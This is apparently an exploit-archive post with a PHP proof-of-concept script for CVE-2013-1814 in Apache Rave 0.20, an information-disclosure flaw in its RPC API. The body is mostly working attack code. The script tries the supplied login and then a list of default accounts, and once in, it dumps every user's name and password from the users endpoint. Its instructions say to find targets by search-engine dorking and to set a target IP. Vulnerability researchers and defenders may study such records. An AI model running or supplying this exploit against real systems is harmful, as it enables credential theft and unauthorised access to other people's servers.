============================================================================================================================================= | # Title : Apache Rave 0.20 Disclosure of user information vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) | | # Vendor : https://archive.apache.org/dist/rave/binaries/apache-rave-0.20-bin.tar.gz.sha | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: Extract user data from Apache Rave by exploiting a vulnerability in the RPC API. (Related : https://packetstorm.news/files/id/180605/ Linked CVE numbers: CVE-2013-1814 ) . [+] save code as poc.php. [+] Set target : line 90 [+] PayLoad : "canonical", "john.doe" => "john.doe", "jane.doe" => "jane.doe", "johnldap" => "johnldap", "four.col" => "four.col" ]; public function __construct($target, $port = 8080, $username = "", $password = "") { $this->target = $target; $this->port = $port; $this->username = $username; $this->password = $password; } private function sendRequest($url, $method = "GET", $data = [], $cookie = "") { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method); if ($method === "POST") { curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data)); } if ($cookie) { curl_setopt($ch, CURLOPT_COOKIE, "JSESSIONID=$cookie"); } $response = curl_exec($ch); curl_close($ch); return $response; } public function login($username, $password) { $url = "http://{$this->target}:{$this->port}/portal/j_spring_security_check"; $response = $this->sendRequest($url, "POST", [ "j_username" => $username, "j_password" => $password ]); preg_match('/JSESSIONID=([^;]+)/', $response, $matches); return $matches[1] ?? null; } public function discloseUsers($cookie) { $url = "http://{$this->target}:{$this->port}/portal/app/api/rpc/users/get?offset=0"; $response = $this->sendRequest($url, "GET", [], $cookie); return json_decode($response, true); } public function run() { echo "[*] Trying to authenticate...\n"; $cookie = $this->login($this->username, $this->password); if (!$cookie) { echo "[-] Failed with provided credentials, trying default accounts...\n"; foreach ($this->default_accounts as $user => $pass) { echo "[*] Trying $user...\n"; $cookie = $this->login($user, $pass); if ($cookie) { echo "[+] Logged in with $user!\n"; break; } } } if (!$cookie) { echo "[-] Login failed!\n"; return; } echo "[*] Fetching user data...\n"; $users = $this->discloseUsers($cookie); if ($users && isset($users["result"]["resultSet"])) { foreach ($users["result"]["resultSet"] as $user) { echo "[+] Found user: " . $user["username"] . " - " . $user["password"] . "\n"; } } else { echo "[-] No users found!\n"; } } } $exploit = new ApacheRaveExploit("target-ip", 8080, "admin", "password"); $exploit->run(); Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================